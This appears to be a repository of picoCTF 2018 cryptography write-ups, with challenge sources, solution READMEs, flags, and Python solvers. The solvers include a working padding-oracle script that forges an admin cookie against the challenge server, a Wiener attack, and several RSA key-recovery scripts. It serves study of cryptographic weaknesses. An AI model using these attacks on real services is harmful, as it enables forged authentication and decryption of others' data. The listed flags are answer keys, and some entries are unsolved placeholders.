mac = message[-40:].decode('hex')
message = message[:-40].decode('hex')
h.update(message)
if h.digest() == mac:
return True
return False
def check_padding(message):
check_char = ord(message[-2:].decode('hex'))
if (check_char < 17) and (check_char > 0): #bud
return message[:-check_char*2]
else:
return False
welcome = "Welcome, Agent 006!"
print welcome
options = """Select an option:
Encrypt message (E)
Send & verify (S)
"""
while True:
encrypt_or_send = raw_input(options)
if "e" in encrypt_or_send.lower():
sitrep = raw_input("Please enter your situation report: ")
message = """Agent,
Greetings. My situation report is as follows:
{0}
My agent identifying code is: {1}.
Down with the Soviets,
006
""".format( sitrep, agent_code )
PS = raw_input("Anything else? ")
h = hashlib.sha1()
message = message+PS
h.update(message)
message = pad(message+ h.digest())
IV = ''.join(random.choice(digits + 'abcdef') for _ in range(32))
print "encrypted: {}".format(encrypt(key, message, IV ))
elif "s" in encrypt_or_send.lower():
sitrep = raw_input("Please input the encrypted message: ")
iv = sitrep[:32]
c = sitrep[32:]
if reuse.check(iv):
message = decrypt(key, c, iv)
message = check_padding(message)
if message:
if verify_mac(message):
print("Successful decryption.")
else:
print("Ooops! Did not decrypt successfully. Please send again.")
else:
print("Ooops! Did not decrypt successfully. Please send again.")
else:
print("Cannot reuse IVs!")
================================================
FILE: Cryptography/Magic Padding Oracle/README.md
================================================
# Magic Padding Oracle
Points: 450
## Category
Cryptography
## Question
>Can you help us retreive the flag from this crypto service? Connect with `nc 2018shell1.picoctf.com 27533`. We were able to recover some [Source](files/pkcs7.py) Code.
### Hint
>Paddding Oracle [Attack](https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth)
## Solution
We have to submit the encrypted JSON string with the `"is_admin"` property set to a string called `"true"` and the `"expires"` property changed to a date later than the date the string was submitted. Also take note that the date string has to adhere to the following format: `%Y-%m-%d`. The `"username"` property has to be present but can be of any value.
This JSON string: `{"username": "cafebabe!","is_admin": "true","expires": "2020-1-1"}` was accepted.
The encrypted JSON string is: `bab23fa6e34b02b1b4279bf85d89e03e4d8fc9cc9dee572b7c40c9c710f27426437ce07b7d4356c9a97dff9840209d50c9b18d4547f557437fe70d5c62f66283590c5cdaf042515720b8879e43de91e4cafebabecafebabecafebabecafebabe`
In order to encrypt it without the key, we can use the padding oracle attack to make a decryption oracle. This decryption oracle is able to take in a ciphertext block and output the corresponding decrypted ciphertext block.
We are able to do this by submitting 2 ciphertext blocks. The first is the IV, which we will use to brute force the decrypted ciphertext block, and the second is the actual ciphertext block.
We try all bytes (`0x00` to `0xff`) on the last byte of the IV until we get a valid padding response (in this case, the server would respond with an error from `json.loads()` because what was being submitted is not a valid JSON string).
Because we know the padding bytes (`0x01`, `0x02 0x02`, ... `0x0f 0x0f ... 0x0f`, `0x10 0x10 ... 0x10`), we can continue with the 2nd last byte all the way until the first byte to figure out what the decrypted ciphertext is.
By using the decryption oracle, we can encrypt the JSON string by working from the back of the plaintext string (properly padded, split into 16 byte blocks) by setting the last ciphertext block as an arbitrary 16 byte ciphertext block (I used `0xcafebabecafebabecafebabecafebabe`).
Then by XOR-ing the decrypted ciphertext block and the last 16 bytes of the plaintext, we can get the previous ciphertext block. We repeatedly can do this all the way from the back until we get to the first ciphertext block (the IV).
Then we concatenate the IV and all the ciphertext blocks and submit it to the server, which will decrypt into the JSON string and return the flag.
#### Note
For some reason the communication with the server is really slow. I am not sure whether it is a limitation of the nclib library, but as a result each 16 byte block takes ~1 hour to decrypt.
Hence encrypting the entire JSON string takes around -4 hours because it's 4 blocks long.
### Flag
`picoCTF{0r4cl3s_c4n_l34k_c644af03}`
================================================
FILE: Cryptography/Magic Padding Oracle/files/pkcs7.py
================================================
#!/usr/bin/python2
import os
import json
import sys
import time
from Crypto.Cipher import AES
cookiefile = open("cookie", "r").read().strip()
flag = open("flag", "r").read().strip()
key = open("key", "r").read().strip()
welcome = """
Welcome to Secure Encryption Service version 1.63
"""
def pad(s):
return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)
def isvalidpad(s):
return ord(s[-1])*s[-1:]==s[-ord(s[-1]):]
def unpad(s):
return s[:-ord(s[len(s)-1:])]
def encrypt(m):
IV="This is an IV456"
cipher = AES.new(key.decode('hex'), AES.MODE_CBC, IV)
return IV.encode("hex")+cipher.encrypt(pad(m)).encode("hex")
def decrypt(m):
cipher = AES.new(key.decode('hex'), AES.MODE_CBC, m[0:32].decode("hex"))
return cipher.decrypt(m[32:].decode("hex"))
# flush output immediately
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
print welcome
print "Here is a sample cookie: " + encrypt(cookiefile)
# Get their cookie
print "What is your cookie?"
cookie2 = sys.stdin.readline()
# decrypt, but remove the trailing newline first
cookie2decoded = decrypt(cookie2[:-1])
if isvalidpad(cookie2decoded):
d=json.loads(unpad(cookie2decoded))
print "username: " + d["username"]
print "Admin? " + d["is_admin"]
exptime=time.strptime(d["expires"],"%Y-%m-%d")
if exptime > time.localtime():
print "Cookie is not expired"
else:
print "Cookie is expired"
if d["is_admin"]=="true" and exptime > time.localtime():
print "The flag is: " + flag
else:
print "invalid padding"
================================================
FILE: Cryptography/Magic Padding Oracle/solution/requirements.txt
================================================
nclib
================================================
FILE: Cryptography/Magic Padding Oracle/solution/solution.py
================================================
import nclib, sys, binascii
# Generate all 256 binary combinations of 1 byte
byte_combinations = []
for i in range(0, 256):
i = hex(i)[2:]
byte_combinations.append('0' + i if len(i) == 1 else i)
# Add zeros to the front of hex string.
def add_zeros(string, desired_length):
while len(string) < desired_length:
string = '0' + string
return string
# Uses the padding oracle to return the decrypted hex string of the input cipherblock
def decrypt_ciphertext(cipherblock):
# Queries the server and submits the ciphertext
# If invalid padding, return False. Else True (might be buggy if input is wrongly formatted)
def check_pad(s: str) -> bool:
print(s[:32]) # Print the IV
nc = nclib.Netcat(connect = ('2018shell1.picoctf.com', 27533), verbose = False)
nc.settimeout(2)
# Receive the first 2 messages given by the server
nc.recv()
nc.recv()
# Send the cipherblocks with new line char behind to signify the end of the input
nc.send(s.encode() + b'\n')
# Receive data
data = nc.recv(100000)
if b'invalid padding' in data:
return False
else:
print(data) # Make sure data is error about JSON string
return True
decrypted_cipherblock = ''
for i in range(1, 17): # Block length is 128 bits = 16 bytes
# Try all combination of bits
for byte in byte_combinations:
found = False
iv_prime = '0' * (32 - i * 2) + byte
if i != 1: # Account for the padding for 2nd byte onwards
# Get the values required to achieve the back padding by XOR-ing the pad with the known D(C)
pad = (byte_combinations[i] * (i - 1))
padding_for_iv = hex(int(pad, base=16) ^ int(decrypted_cipherblock, base=16))[2:]
padding_for_iv = add_zeros(padding_for_iv, len(pad))
iv_prime += padding_for_iv
# Send to padding oracle
res = check_pad(iv_prime + cipherblock)
if res == True: # Correct padding obtained, calculate D(C)'s byte
val = int(byte_combinations[i], base=16) ^ int(byte, base=16)
val = hex(val)[2:]
decrypted_cipherblock = '0' + val + decrypted_cipherblock if len(val) == 1 else val + decrypted_cipherblock
found = True
break
# If all 256 bytes have been exhausted without a valid padding, then something went wrong.
if found == False:
print('Error - couldn\'t find proper padding.')
return
return decrypted_cipherblock
# Encrypts a given plaintext by using the padding oracle attack as a decryption oracle.
def encrypt_plaintext(plaintext):
# Splits input string into blocks of 16 bytes and pads the last block according to PKCS #7
def split_input_string(input_string):
BLOCK_LENGTH = 16 # 16 bytes
splitted_input_string = []
# Split into blocks of 16 bytes
for _ in range(len(input_string) // BLOCK_LENGTH):
splitted_input_string.append(input_string[:BLOCK_LENGTH])
input_string = input_string[BLOCK_LENGTH:]
# Pad the last block
padding_required = BLOCK_LENGTH - len(input_string)
padding_required = '0' + hex(padding_required)[2:] if len(hex(padding_required)[2:]) == 1 else hex(padding_required)[2:]
while len(input_string) < BLOCK_LENGTH:
input_string += binascii.unhexlify(padding_required.encode())
# Append to output array of blocks of 16 bytes and return
splitted_input_string.append(input_string)
return splitted_input_string
# Get 16 byte blocks of the plaintext
plaintext = split_input_string(plaintext.encode())
arbitrary_ciphertext_block = 'cafebabecafebabecafebabecafebabe'
# Ciphertext should end with this arbitrary block
ciphertext = [arbitrary_ciphertext_block]
# Get blocks from the back of the plaintext
current_cipher_block = arbitrary_ciphertext_block
for block in plaintext[::-1]:
# Get D(C_n)
current_decrypted_block = decrypt_ciphertext(current_cipher_block)
# Get C_n-1 by XOR-ing with plaintext block
previous_cipher_block = int.from_bytes(block, byteorder='big') ^ int(current_decrypted_block, base=16)
previous_cipher_block = hex(previous_cipher_block)[2:]
previous_cipher_block = add_zeros(previous_cipher_block, 32)
ciphertext.append(previous_cipher_block) # Append to ciphertext
current_cipher_block = previous_cipher_block # Make prev cipherblock current cipherblock
return ciphertext
plaintext = '{"username": "cafebabe!","is_admin": "true","expires": "2020-1-1"}'
ciphertext = encrypt_plaintext(plaintext)
# Print out ciphertext
for block in ciphertext[::-1]:
print(block, end=' ')
================================================
FILE: Cryptography/Safe RSA/README.md
================================================
# Safe RSA
Points: 250
## Category
Cryptography
## Question
>Now that you know about RSA can you help us decrypt this [ciphertext](files/ciphertext)? We don't have the decryption key but something about those values looks funky..
### Hint
>RSA [tutorial](https://en.wikipedia.org/wiki/RSA_(cryptosystem))
>
>Hmmm that e value looks kinda small right?
>
>These are some really big numbers.. Make sure you're using functions that don't lose any precision!
## Solution
Since _n_ is really huge and _e_ is really tiny, we can figure out the message without needing to factorise _n_!
We can assume that `m ** e < n`. Therefore we do a cube root on _c_, and convert the value into ascii.
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{e_w4y_t00_sm411_81b6559f}`
================================================
FILE: Cryptography/Safe RSA/files/ciphertext
================================================
N: 374159235470172130988938196520880526947952521620932362050308663243595788308583992120881359365258949723819911758198013202644666489247987314025169670926273213367237020188587742716017314320191350666762541039238241984934473188656610615918474673963331992408750047451253205158436452814354564283003696666945950908549197175404580533132142111356931324330631843602412540295482841975783884766801266552337129105407869020730226041538750535628619717708838029286366761470986056335230171148734027536820544543251801093230809186222940806718221638845816521738601843083746103374974120575519418797642878012234163709518203946599836959811
e: 3
ciphertext (c): 2205316413931134031046440767620541984801091216351222789180582564557328762455422721368029531360076729972211412236072921577317264715424950823091382203435489460522094689149595951010342662368347987862878338851038892082799389023900415351164773
================================================
FILE: Cryptography/Safe RSA/solution/solve.py
================================================
#!/usr/bin/python
from gmpy2 import *
get_context().precision=500
c = mpq(2205316413931134031046440767620541984801091216351222789180582564557328762455422721368029531360076729972211412236072921577317264715424950823091382203435489460522094689149595951010342662368347987862878338851038892082799389023900415351164773, 1)
print str(hex(int(cbrt(c))))[2:-1].decode('hex')
================================================
FILE: Cryptography/SpyFi/README.md
================================================
# SpyFi
Points: 300
## Category
Cryptography
## Question
>James Brahm, James Bond's less-franchised cousin, has left his secure communication with HQ running, but we couldn't find a way to steal his agent identification code. Can you? Conect with `nc 2018shell1.picoctf.com 30399`. [Source](files/spy_terminal_no_flag.py).
### Hint
>What mode is being used?
## Solution
Unsolved.
### Flag
`flag`
================================================
FILE: Cryptography/SpyFi/files/spy_terminal_no_flag.py
================================================
#!/usr/bin/python2 -u
from Crypto.Cipher import AES
agent_code = """flag"""
def pad(message):
if len(message) % 16 != 0:
message = message + '0'*(16 - len(message)%16 )
return message
def encrypt(key, plain):
cipher = AES.new( key.decode('hex'), AES.MODE_ECB )
return cipher.encrypt(plain).encode('hex')
welcome = "Welcome, Agent 006!"
print welcome
sitrep = raw_input("Please enter your situation report: ")
message = """Agent,
Greetings. My situation report is as follows:
{0}
My agent identifying code is: {1}.
Down with the Soviets,
006
""".format( sitrep, agent_code )
message = pad(message)
print encrypt( """key""", message )
================================================
FILE: Cryptography/Super Safe RSA/README.md
================================================
# Super Safe RSA
Points: 350
## Category
Cryptography
## Question
>Dr. Xernon made the mistake of rolling his own crypto.. Can you find the bug and decrypt the message? Connect with `nc 2018shell1.picoctf.com 6262`.
### Hint
>Just try the first thing that comes to mind.
## Solution
The first thing that comes to mind is to factorise _n_, to get the totient, and generate the private key. We use [msieve](https://sourceforge.net/projects/msieve/) as our factorising tool.
Just factorise the primes, and get _p_ and _q_. A Python script is needed to decrypt the ciphertext and get the flag
Working solution [solve.py](solution/solve.py)
### Flag
`picoCTF{us3_l@rg3r_pr1m3$_2711}`
================================================
FILE: Cryptography/Super Safe RSA/solution/ciphertext
================================================
c: 7929011382767041584510203527859505899601572024468762886720475415218105799874362
n: 11930191517420424428458862771846268087893161863249464023139623203854660066472157
e: 65537
================================================
FILE: Cryptography/Super Safe RSA/solution/solve.py
================================================
#!/usr/bin/python
from gmpy2 import *
c = 7929011382767041584510203527859505899601572024468762886720475415218105799874362
n = 11930191517420424428458862771846268087893161863249464023139623203854660066472157
e = 65537
p = 92027970011808537690210426025129587299
q = 129636582398694722475936463924386691191743
def eea(a,b):
if b==0:return (1,0)
(q,r) = (a//b,a%b)
(s,t) = eea(b,r)
return (t, s-(q*t) )
def find_inverse(x,y):
inv = eea(x,y)[0]
if inv < 1: inv += y #we only want positive values
return inv
totient = (p - 1) * (q - 1)
d = find_inverse(e, totient)
flag = powmod(c, d, n)
print hex(flag)[2:].decode('hex')
================================================
FILE: Cryptography/Super Safe RSA 2/README.md
================================================
# Super Safe RSA 2
Points: 425
## Category
Cryptography
## Question
>Wow, he made the exponent really large so the encryption MUST be safe, right?! Connect with `nc 2018shell1.picoctf.com 56543`.
### Hint
>What is the usual value for e?
## Solution
Working solution [solve.py](solution/solve.py).
### Flag
`picoCTF{w@tch_y0ur_Xp0n3nt$_c@r3fu11y_2104643}`
================================================
FILE: Cryptography/Super Safe RSA 2/solution/ciphertext
================================================
c: 87973714357981711192552122844931994201928929629523523402698449229349318496325838631069992408358538609456707487292932430988908376333690020467856573339571710564864261213347859858094994302558444565941871798549199610810852463994468365272979667205962334739912686073389255122096601393196371860158722056997802747144
n: 123011419727242929605859484379712787224119427868122185028414426038747211967728126687082223191959583800124030930442533997557997625495312608148837196827665382944411142837816321635710707548473070155845149369804586838545770200114861944189730393681376431146673015470955622822572616394605670811484761576817673309001
e: 20370827750732677953101194500404700852089173301382884082478321647291201786559551992537091540692087873762090234342322985115231826746732803397154738501467143140654322623572067396058860233911575260540468106570172920030157403146163826401598627492164762337650828047117823273414399019740348998847585859920303350373
================================================
FILE: Cryptography/Super Safe RSA 2/solution/solve.py
================================================
#!/usr/bin/python
from gmpy2 import *
from wienerAttack.RSAwienerHacker import *
N = 123011419727242929605859484379712787224119427868122185028414426038747211967728126687082223191959583800124030930442533997557997625495312608148837196827665382944411142837816321635710707548473070155845149369804586838545770200114861944189730393681376431146673015470955622822572616394605670811484761576817673309001
C = 87973714357981711192552122844931994201928929629523523402698449229349318496325838631069992408358538609456707487292932430988908376333690020467856573339571710564864261213347859858094994302558444565941871798549199610810852463994468365272979667205962334739912686073389255122096601393196371860158722056997802747144
E = 20370827750732677953101194500404700852089173301382884082478321647291201786559551992537091540692087873762090234342322985115231826746732803397154738501467143140654322623572067396058860233911575260540468106570172920030157403146163826401598627492164762337650828047117823273414399019740348998847585859920303350373
d = hack_RSA(E, N)
print hex(powmod(C, d, N))[2:].decode('hex')
================================================
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/Arithmetic.py
================================================
'''
Created on Dec 22, 2011
@author: pablocelayes
'''
def egcd(a,b):
'''
Extended Euclidean Algorithm
returns x, y, gcd(a,b) such that ax + by = gcd(a,b)
'''
u, u1 = 1, 0
v, v1 = 0, 1
while b:
q = a // b
u, u1 = u1, u - q * u1
v, v1 = v1, v - q * v1
a, b = b, a - q * b
return u, v, a
def gcd(a,b):
'''
2.8 times faster than egcd(a,b)[2]
'''
a,b=(b,a) if a<b else (a,b)
while b:
a,b=b,a%b
return a
def modInverse(e,n):
'''
d such that de = 1 (mod n)
e must be coprime to n
this is assumed to be true
'''
return egcd(e,n)[0]%n
def totient(p,q):
'''
Calculates the totient of pq
'''
return (p-1)*(q-1)
def bitlength(x):
'''
Calculates the bitlength of x
'''
assert x >= 0
n = 0
while x > 0:
n = n+1
x = x>>1
return n
def isqrt(n):
'''
Calculates the integer square root
for arbitrary large nonnegative integers
'''
if n < 0:
raise ValueError('square root not defined for negative numbers')
if n == 0:
return 0
a, b = divmod(bitlength(n), 2)
x = 2**(a+b)
while True:
y = (x + n//x)//2
if y >= x:
return x
x = y
def is_perfect_square(n):
'''
If n is a perfect square it returns sqrt(n),
otherwise returns -1
'''
h = n & 0xF; #last hexadecimal "digit"
if h > 9:
return -1 # return immediately in 6 cases out of 16.
# Take advantage of Boolean short-circuit evaluation
if ( h != 2 and h != 3 and h != 5 and h != 6 and h != 7 and h != 8 ):
# take square root if you must
t = isqrt(n)
if t*t == n:
return t
else:
return -1
return -1
#TEST functions
def test_is_perfect_square():
print("Testing is_perfect_square")
testsuit = [4, 0, 15, 25, 18, 901, 1000, 1024]
for n in testsuit:
print("Is ", n, " a perfect square?")
if is_perfect_square(n)!= -1:
print("Yes!")
else:
print("Nope")
if __name__ == "__main__":
test_is_perfect_square()
================================================
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/ContinuedFractions.py
================================================
'''
Created on Dec 14, 2011
@author: pablocelayes
'''
def rational_to_contfrac (x, y):
'''
Converts a rational x/y fraction into
a list of partial quotients [a0, ..., an]
'''
a = x//y
if a * y == x:
return [a]
else:
pquotients = rational_to_contfrac(y, x - a * y)
pquotients.insert(0, a)
return pquotients
#TODO: efficient method that calculates convergents on-the-go, without doing partial quotients first
def convergents_from_contfrac(frac):
'''
computes the list of convergents
using the list of partial quotients
'''
convs = [];
for i in range(len(frac)):
convs.append(contfrac_to_rational(frac[0:i]))
return convs
def contfrac_to_rational (frac):
'''Converts a finite continued fraction [a0, ..., an]
to an x/y rational.
'''
if len(frac) == 0:
return (0,1)
elif len(frac) == 1:
return (frac[0], 1)
else:
remainder = frac[1:len(frac)]
(num, denom) = contfrac_to_rational(remainder)
# fraction is now frac[0] + 1/(num/denom), which is
# frac[0] + denom/num.
return (frac[0] * num + denom, num)
def test1():
'''
Verify that the basic continued-fraction manipulation stuff works.
'''
testnums = [(1, 1), (1, 2), (5, 15), (27, 73), (73, 27)]
for r in testnums:
(num, denom) = r
print('rational number:')
print(r)
contfrac = rational_to_contfrac (num, denom)
print('continued fraction:')
print(contfrac)
print('convergents:')
print(convergents_from_contfrac(contfrac))
print('***********************************')
if __name__ == "__main__":
test1()
================================================
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/RSAwienerHacker.py
================================================
'''
Created on Dec 14, 2011
@author: pablocelayes
'''
import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator
def hack_RSA(e,n):
'''
Finds d knowing (e,n)
applying the Wiener continued fraction attack
'''
frac = ContinuedFractions.rational_to_contfrac(e, n)
convergents = ContinuedFractions.convergents_from_contfrac(frac)
for (k,d) in convergents:
#check if d is actually the key
if k!=0 and (e*d-1)%k == 0:
phi = (e*d-1)//k
s = n - phi + 1
# check if the equation x^2 - s*x + n = 0
# has integer roots
discr = s*s - 4*n
if(discr>=0):
t = Arithmetic.is_perfect_square(discr)
if t!=-1 and (s+t)%2==0:
print("Hacked!")
return d
# TEST functions
def test_hack_RSA():
print("Testing Wiener Attack")
times = 5
while(times>0):
e,n,d = RSAvulnerableKeyGenerator.generateKeys(1024)
print("(e,n) is (", e, ", ", n, ")")
print("d = ", d)
hacked_d = hack_RSA(e, n)
if d == hacked_d:
print("Hack WORKED!")
else:
print("Hack FAILED")
print("d = ", d, ", hacked_d = ", hacked_d)
print("-------------------------")
times -= 1
if __name__ == "__main__":
#test_is_perfect_square()
#print("-------------------------")
test_hack_RSA()
================================================
FILE: Cryptography/Super Safe RSA 2/solution/wienerAttack/__init__.py
================================================
================================================
FILE: Cryptography/Super Safe RSA 3/README.md
================================================
# Super Safe RSA 3
Points: 600
## Category
Cryptography
## Question
>The more primes, the safer.. right.?.? Connect with `nc 2018shell1.picoctf.com 11423`.
### Hint
>How would you find d if there are more than 2 prime factors of n?
## Solution
Use msieve to install to factorise the primes
Calculate the totient by doing `(prime_1 - 1) * (prime_2 - 1) ... (prime_n - 1)` where `n` is the total number of primes
Reconstruct the private key, and decrypt the message
Recommended reads: https://crypto.stackexchange.com/questions/44110/rsa-with-3-primes
### Flag
`picoCTF{p_&_q_n0_r_$_t!!_6629910}`
================================================
FILE: Cryptography/Super Safe RSA 3/solution/ciphertext
================================================
c: 38267717521783805358997028434192574072066206734150058806702039241540545591327160817138103308778806260550691278229033409184518095836671759886018797380100194106653804590171378094033599430892604979401307896519429546854583917860199582081050782350831478073093769585362279610973195866544327315887867433642490547
n: 40795360971651974271650711440993964050307855147720011233981545415438122680764985969049700071051749071781096004576107493076004911609956646026586641164708122628888234552831947705825820830717771374968853614494573673171451401812260688186915972782495102601063537646203830376891448685264916094254020958827455069
e: 65537
================================================
FILE: Cryptography/Super Safe RSA 3/solution/solve.py
================================================
#!/usr/bin/python
from gmpy2 import *
n = 40795360971651974271650711440993964050307855147720011233981545415438122680764985969049700071051749071781096004576107493076004911609956646026586641164708122628888234552831947705825820830717771374968853614494573673171451401812260688186915972782495102601063537646203830376891448685264916094254020958827455069
c = 38267717521783805358997028434192574072066206734150058806702039241540545591327160817138103308778806260550691278229033409184518095836671759886018797380100194106653804590171378094033599430892604979401307896519429546854583917860199582081050782350831478073093769585362279610973195866544327315887867433642490547
e = 65537
primes = [
2408536589,
2613433873,
2646493621,
2666585221,
2670389531,
2683499473,
2685364093,
2741484497,
2863351783,
2886722177,
2925436511,
3064431973,
3108375629,
3148348271,
3266962103,
3274199927,
3340290809,
3347444599,
3358514681,
3521655793,
3548118169,
3874420523,
3896780983,
3957297011,
3993894323,
4051778999,
4079155009,
4079785417,
4111436137,
4137823787,
4173914051,
4186089221
]
totient = 1
for i in primes:
totient *= (i - 1)
assert gcd(e, totient) == 1
d = invert(e, totient)
get_context().precision=1000
m = powmod(c, d, n)
print str(hex(int(m)))[2:-1].decode('hex')
================================================
FILE: Cryptography/blaise's cipher/README.md
================================================
# blaise's cipher
Points: 200
## Category
Cryptography
## Question
>My buddy Blaise told me he learned about this cool cipher invented by a guy also named Blaise! Can you figure out what it says? Connect with `nc 2018shell1.picoctf.com 46966`.
### Hint
>There are tools that make this easy.
>
>This cipher was NOT invented by Pascal
## Solution
This is a Vigenère Cipher, this time without a key. Bruteforce using an online tool. Online tool: https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx
### Flag
`picoCTF{v1gn3r3_c1ph3rs_ar3n7_bad_cdf08bf0}`
================================================
FILE: Cryptography/blaise's cipher/solution/ciphertext
================================================
Encrypted message:
Yse lncsz bplr-izcarpnzjo dkxnroueius zf g uzlefwpnfmeznn cousex bls ltcmaqltki my Rjzn Hfetoxea Gqmexyt axtfnj 1467 fyd axpd g rptgq nivmpr jndc zt dwoynh hjewkjy cousex fwpnfmezx. Llhjcto'x dyyypm uswy ybttimpd gqahggpty fqtkw debjcar bzrjx, lnj xhizhsey bprk nydohltki my cwttosr tnj wezypr uk ehk hzrxjdpusoitl llvmlbky tn zmp cousexypxz. Qltkw, tn 1508, Ptsatsps Zwttnjxiax, tn nnd wuwv Puqtgxfahof, tnbjytki ehk ylbaql rkhea, g hciznnar hzmvtyety zf zmp Volpnkwp cousex. Yse Zwttnjxiax nivmpr, nthebjc, otqj pxtgijjo a vwzgxjdsoap, roltd, gso pxjoiiylbrj dyyypm ltc scnecnnyg hjewkjy cousex fwpnfmezx.
Hhgy ts tth ktthn gx ehk Atgksprk htpnjc wgx zroltngqwy jjdcxnmej gj Gotgat Gltzndtg Gplrfdo os siy 1553 gzoq Ql cokca jjw. Sol. Riualn Hfetoxea Hjwlgxz. Hk gfiry fpus ehk ylbaql rkhea uk Eroysesnfs, hze ajipd g wppkfeitl "noaseexxtgt" (f vee) yz scnecn htpnjc arusahjes kapre qptzjc. Wnjcegx Llhjcto fyd Zwttnjxiax fski l focpd vfetkwy ol xfbyyttaytotx, Merqlsu'x dcnjxe sjlnz yse vfetkwy ol xfbyyttaytotx noaqo bk jlsoqj cnfygki disuwy hd derjntosr a tjh kkd. Veex hexj eyvnnarqj sosrlk bzrjx zr ymzrz usrgxps, qszwt yz buys pgweikx tn gigathp, ox ycatxxizypd "uze ol glnj" fwotl hizm ehk rpsyfre. Hjwlgxz's sjehui ehax cewztrki dtxtyg yjnuxney ltc otqj tnj vee. Fd iz nd rkqltoaple jlse yz skhfrk f dhuwe kkd ahxfde, yfj be f arkatoax aroaltk hznbjcsgytot, Gplrfdo'y xjszjx wgx notxtdkwlbrd xoxj deizce.
Hqliyj oe Bnretjce vzmloxsej mts jjdcxnatoty ol f disnwax gft yycotlpr gzeoqjj cousex gpfuwp tnj noawe ol Mpnxd TIO tq Fxfyck, ny 1586. Lgypr, os ehk 19ys ckseuxd, ehk nyvkseius zf Hjwlgxz's inahkw hay rtsgyerogftki eo Bnretjce. Jfgij Plht ny hox moup Ehk Hzdkgcegppry qlmkseej yse sndazycihzeius my yfjitl ehgy siyyzre mld "olyoxjo tnnd isuzrzfyt itytxnmuznzn gso itxeegi yasjo a xjrrkxdibj lnj jwesjytgwj cousex kzr nnx [Volpnkwp] tntfgn mp hgi yozmtnm yz du bttn ne". pohzCZK{g1gt3w3_n1pn3wd_ax3s7_maj_hof08hk0}
Ehk Atgksprk htpnjc ggnyej f cevzeaznzn ltc bknyg kcnevytotfwle xerusr. Nuypd gzehuw lnj rltnjxaznnigs Nhgwwey Qftcnogk Izdmxzn (Rjhiy Hlrxtwl) ifwlki ehk Atgksprk htpnjc utgcegplbrj tn nnd 1868 pojne "Zmp Arusahje Cousex" ny a imtljwpn'y rlggetnk. Ny 1917, Sinpnznqii Fxexnnat ipsiwtbki ehk Atgksprk htpnjc ay "nxpuxdihqp ol ycatxwaznzn". Zmts xjauzfeius hay szt jjdexapd. Imlrrjd Bggmamj ts qszwt yz hgap bxtvet f gaxnlnz tq tnj nivmpr gx paxqj ay 1854; mzwkapr, nj oijs'e pagwiym siy bzrq. Plsoxvi kseixjwy hwzkk yse inahkw lnj ufbrndhki ehk ypcnstqaj tn zmp 19tn hpnzzcy. Kapn hjqoxj ehox, ehuzrh, ytxe yptlrjo cxdatgsllexes itflj tncgxtotfwle gcegp ehk htpnjc it yse 16zm netyfre.
Hcyvyzgxfahoh dloip raqp uyjo ay f narhflgytot ftd hd ehk Xhiyx Lrsd mezbpet 1914 fyd 1940.
Zmp Volpnkwp cousex nd soralk jyoals tu gp a lnplj htpnjc il ne iy zdej ny cusuutheius hizm nivmpr jndky. Yse Ityfkiprgyp Szfeey tq Asjciif, qox jiasuwe, axpd g gcayx nivmpr jndk zt tmvqpmkse tnj Gimjyexj nivmpr jzcitl ehk Fxexnnat Htvoq Hax. Yse Ityfkiprghj's sjdsglps cjce lfc fxtx skhcez fyd zmp Utnzn xjrurfcle hcaippd zmpix rpsyfrey. Ysruzrhuze tnj hax, yse Ityfkiprgyp lkfoexxsiv ucisfcird cernpd auzn zmcek ppy vmcayjd, "Mgsnhkxeex Gwulk", "Nosuwezj Giiyzre" fyd, gx ehk blr ifxe zt l crtde, "Itxe Xjerogftoty".
Goqmexy Gexslm zwtej yz rkulix yse hwzkks nivmpr (iwpaznyg zmp Vkwyas–Atgksprk htpnjc it 1918), gft, tt xazypr cmlt nj oij, yse inahkw hay xeirq gursprggwe zt nreueatfwyynd. Vkwyas'x hoxp, socjgex, jgetyfarqj lki eo zmp otj-eisj aaj, f ehktceznnarqj utgcegplbrj nivmpr.
================================================
FILE: Cryptography/caesar cipher 1/README.md
================================================
# caesar cipher 1
Points: 150
## Category
Cryptography
## Question
>This is one of the older ciphers in the books, can you decrypt the [message](files/ciphertext)? You can find the ciphertext in /problems/caesar-cipher-1_4_e4dc6dcfb004bdade0b9ce8e44f1bac4 on the shell server.
### Hint
>caesar cipher [tutorial](https://learncryptography.com/classical-encryption/caesar-cipher)
## Solution
This is a simple caesar cipher. Online tool: https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript
### Flag
`picoCTF{justagoodoldcaesarciphertobrvmri}`
================================================
FILE: Cryptography/caesar cipher 1/files/ciphertext
================================================
picoCTF{domnuaiixifxwuymulwcjbylnivlpglc}
================================================
FILE: Cryptography/caesar cipher 2/README.md
================================================
# caesar cipher 2
Points: 250
## Category
Cryptography
## Question
>Can you help us decrypt this [message](files/)? We believe it is a form of a caesar cipher. You can find the ciphertext in /problems/caesar-cipher-2_3_4a1aa2a4d0f79a1f8e9a29319250740a on the shell server.
### Hint
>You'll have figure out the correct alphabet that was used to encrypt the ciphertext from the ascii character set
>
>[ASCII Table](https://www.asciitable.com/)
## Solution
To do
### Flag
`picoCTF{cAesaR_CiPhErS_juST_aREnT_sEcUrE}`
================================================
FILE: Cryptography/caesar cipher 2/files/ciphertext
================================================
4-'3evh?'c)7%t#e-r,g6u#.9uv#%tg2v#7g'w6gA
================================================
FILE: Cryptography/hertz/README.md
================================================
# hertz
Points: 150
## Category
Cryptography
## Question
>Here's another simple cipher for you where we made a bunch of substitutions. Can you decrypt it? Connect with `nc 2018shell1.picoctf.com 18581`.
### Hint
>NOTE: Flag is not in the usual flag format
## Solution
This is a Substitution Cipher. Use an online tool to brute-force. Online tool: https://quipqiup.com/
### Flag
`substitution_ciphers_are_solvable_fgnvvgndms`
================================================
FILE: Cryptography/hertz/solution/ciphertext
================================================
-------------------------------------------------------------------------------
uqblrjwm zxrx gm fqvr pojl - mvtmwgwvwgqb_ugyzxrm_jrx_mqokjtox_plbkklbscm
-------------------------------------------------------------------------------
